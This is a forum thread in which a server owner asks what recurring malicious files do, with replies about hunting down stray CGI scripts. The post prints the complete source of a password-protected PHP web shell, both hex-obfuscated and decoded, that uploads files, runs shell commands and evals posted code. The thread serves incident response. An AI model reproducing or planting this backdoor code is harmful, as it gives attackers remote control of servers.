need some help with an infection

hi,

i have an infection on my server. there are some encrypted files on it. they are coming back after delete. the local pc has been tested for infection, but nothing found. passwords on the server were changed. here is a file after decrypt with dezend:

echo "        ";
$s = "696620287374726C656E28245F504F53545B6363635D293D3D30297B69662028245F504F53545B706173735D213D2731323327297B6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6D79662E706173732E666F63757328293B223E3C666F726D206D6574686F643D504F53543E3C696E707574206E616D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F68746D6C3E273B6578697428293B7D6563686F20273C68746D6C3E3C626F6479206267636F6C6F723D23424246464242206F6E6C6F61643D22646F63756D656E742E6D79662E63632E666F63757328293B223E273B6563686F20273C666F726D206E616D653D6D7966206D6574686F643D504F535420656E63747970653D226D756C7469706172742F666F726D2D64617461223E3C696E70757420747970653D68696464656E206E616D653D706173732076616C75653D272E245F504F53545B706173735D2E273E3C696E70757420747970653D66696C65206E616D653D757066696C653E3C696E707574206E616D653D6E65776E616D653E3C696E70757420747970653D7375626D69743E3C62723E273B6563686F20273C696E707574206E616D653D63632073697A653D37332076616C75653D22272E7374726970736C617368657328245F504F53545B63635D292E27223E3C2F666F726D3E273B6563686F20273C7072653E273B20696620286D6F76655F75706C6F616465645F66696C6528245F46494C45535B27757066696C65275D5B27746D705F6E616D65275D2C20245F504F53545B6E65776E616D655D2929207B202F2A6563686F202253656E742E3C62723E5C6E223B2A2F207D69662028245F504F53545B6D66696C655D29207B2020202466703D666F70656E28245F504F53545B6E65776E616D655D2C277727293B202020666F7228246B3D303B20246B3C7374726C656E28245F504F53545B6D66696C655D293B20246B2B3D322920207B20202020246363203D2073756273747228245F504F53545B6D66696C655D2C246B2C32293B20202020246363203D20273078272E2463633B2020202020202020246363203D20726F756E6428246363293B20202020246363203D2063687228246363293B20202020667772697465282466702C246363293B2020207D202066636C6F736528246670293B207D24636F3D7374726970736C617368657328245F504F53545B63635D293B20246F7574203D2027273B69662866756E6374696F6E5F6578697374732827657865632729297B657865632824636F2C246F7574293B246F7574203D206A6F696E28225C6E222C246F7574293B7D656C736569662866756E6374696F6E5F657869737473282770617373746872752729297B6F625F737461727428293B70617373746872752824636F293B246F7574203D206F625F6765745F636F6E74656E747328293B6F625F656E645F636C65616E28293B7D656C736569662866756E6374696F6E5F657869737473282773797374656D2729297B6F625F737461727428293B73797374656D2824636F293B246F7574203D206F625F6765745F636F6E74656E747328293B6F625F656E645F636C65616E28293B7D656C736569662866756E6374696F6E5F65786973747328277368656C6C5F657865632729297B246F7574203D207368656C6C5F657865632824636F293B7D656C736569662869735F7265736F75726365282466203D20706F70656E2824636F2C2272222929297B246F7574203D2022223B7768696C6528214066656F662824662929207B20246F7574202E3D2066726561642824662C31303234293B7D70636C6F7365282466293B7D656C7365207B246F75743D276578206661696C6564273B7D6563686F20246F75743B6563686F20273C2F7072653E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7D20656C7365207B6966286765745F6D616769635F71756F7465735F6770632829297B6576616C287374726970736C617368657328245F504F53545B6363635D29293B7D20656C7365207B6576616C28245F504F53545B6363635D293B7D7D";
$sss = "";
$k = 0;
for ( ; $k < strlen( $s ); $k += 2 )
{
    $ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
    $sss .= $ss;
}
eval( $sss );
$ssss = "************************************************************************************************************************************";
echo "\r\n";
?>

Code (markup):

 

Here is that code decripted if it helps

<?
if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '
<html>
<body bgcolor=#BBFFBB onload="document.myf.pass.focus();">
<form method=POST>
  <input name=pass>
</form>
</body>
</html>
';exit();}echo '
<html>
<body bgcolor=#BBFFBB onload="document.myf.cc.focus();">
';echo '
<form name=myf method=POST enctype="multipart/form-data">
  <input type=hidden name=pass value='.$_POST[pass].'>
  <input type=file name=upfile>
  <input name=newname>
  <input type=submit>
  <br>';
  echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';
echo '<pre>';
if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>
\n";*/ }if ($_POST[mfile]) {   $fp=fopen($_POST[newname],'w');   for($k=0; $k<strlen($_POST[mfile]); $k+=2)  {    $cc = substr($_POST[mfile],$k,2);    $cc = '0x'.$cc;        $cc = round($cc);    $cc = chr($cc);    fwrite($fp,$cc);   }  fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);}}
?>

Code (markup):

 

Many thanks for your help. can anyone explain to me what this script will do.

 

Search for any cgi scripts that you have not previously uploaded. You may want to dig in logs for cgi, unless renamed, possibly x2 or 2x .cgi.

Hope this points you in the right direction.

 

problem is solved. Thx SecureCP for your help.

 

Great! Glad to hear it. Should anything occur in the future, let me know and I'll be glad to help ya out!